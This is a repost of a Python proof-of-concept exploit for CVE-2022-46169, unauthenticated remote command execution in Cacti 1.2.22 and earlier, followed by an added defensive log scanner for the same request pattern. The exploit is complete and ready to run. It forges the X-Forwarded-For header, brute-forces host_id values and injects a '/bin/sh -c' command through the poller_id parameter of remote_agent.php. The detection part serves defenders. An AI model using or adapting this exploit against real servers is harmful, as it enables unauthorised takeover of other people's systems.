PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22

admin, 2023-02-03 11:30:54

positional arguments:
  target                URL of the Cacti application.

optional arguments:
  -f FILE               File containing the command
  -c CMD                Command
  --n_host_ids          The range of host_ids to try (0 - n)
  --n_local_data_ids    The range of local_data_ids to try (0 - n)

import requests
import argparse

parser = argparse.ArgumentParser(
    prog='Poc for CVE-2022-46169',
    description='Exploit Unauthenticated RCE on Cacti <= 1.2.22',
    epilog='Author: saspect')

parser.add_argument('target', help='URL of the Cacti application.')

group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-f', type=argparse.FileType(), help='File containing the command', dest='file')
group.add_argument('-c', help='Command', dest='cmd')

parser.add_argument(
    '--n_host_ids',
    help='The range of host_ids to try (0 - n)',
    default=100,
    dest='n_ids',
    type=int)

parser.add_argument(
    '--n_local_data_ids',
    help='The range of local_data_ids to try (0 - n)',
    default=50,
    dest='n_localids',
    type=int)

args = parser.parse_args()

if args.file:
    # The '-f' argument is supplied, read the command from the file
    cmd = args.file.read().strip()
elif args.cmd:
    # The '-c' argument is supplied, use it as the command
    cmd = args.cmd
else:
    # No command was supplied, print an error message
    parser.print_help()
    exit(1)

payload = f'; /bin/sh -c "{cmd}"'

local_data_ids = [x for x in range(0, args.n_localids)]
target_ip = args.target.split("/")[2]

print(f"[*] Trying for 1 - {args.n_ids} host ids")

for id in range(args.n_ids):
    url = f'{args.target}/remote_agent.php'
    params = {'action': 'polldata', 'host_id': id, 'poller_id': payload, 'local_data_ids[]': local_data_ids}
    headers = {'X-Forwarded-For': target_ip}

    r = requests.get(url, params=params, headers=headers)
    if('cmd.php' in r.text):
        print(f"[+] Exploit Completed for host_id = {id}")
        break
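
A defender-side check for the request shape used above, as an added example that is not part of the original post or the PoC author's code: it scans web server access logs for `remote_agent.php` requests with `action=polldata` whose `poller_id` is not a plain integer. The log lines are constructed samples in combined log format, and the integer-only rule for `poller_id` is an assumption about legitimate poller traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2023:11:30:54 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&host_id=1&poller_id=1&local_data_ids%5B%5D=6 HTTP/1.1" '
    '200 54 "-" "poller"',
    '198.51.100.7 - - [03/Feb/2023:11:31:02 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&host_id=3&poller_id=%3B+%2Fbin%2Fsh+-c+%22id%22'
    '&local_data_ids%5B%5D=0&local_data_ids%5B%5D=1 HTTP/1.1" '
    '200 54 "-" "python-requests/2.28.1"',
    '198.51.100.7 - - [03/Feb/2023:11:31:05 +0000] "GET /cacti/graph_view.php '
    'HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Client IP, timestamp and request URI from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<uri>\S+) [^"]*"')


def suspicious_polldata(line):
    """Return details if the line is a polldata request with a non-integer poller_id."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('uri'))
    if not parts.path.endswith('/remote_agent.php'):
        return None
    # parse_qs URL-decodes values, so encoded shell metacharacters become visible.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if 'polldata' not in qs.get('action', []):
        return None
    # Assumption: a legitimate poller_id consists of digits only.
    bad = [v for v in qs.get('poller_id', []) if not re.fullmatch(r'\d+', v)]
    if not bad:
        return None
    return {'ip': m.group('ip'), 'ts': m.group('ts'),
            'host_id': qs.get('host_id', [''])[0], 'poller_id': bad[0]}


def scan(lines):
    """Collect every suspicious polldata request found in the given log lines."""
    return [hit for hit in map(suspicious_polldata, lines) if hit]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"[!] {hit['ts']} {hit['ip']} host_id={hit['host_id']} poller_id={hit['poller_id']!r}")
```

A hit means the request was attempted, not that it succeeded; sweeps across many `host_id` values from one client are worth correlating, and the durable fix is upgrading to a Cacti release later than 1.2.22.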




Originally published on the WeChat official account Khan安全攻防实验室: PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22

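  • Published on 2023-02-03 11:30:54
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work):
    PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22 https://cn-sec.com/archives/1534922.html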
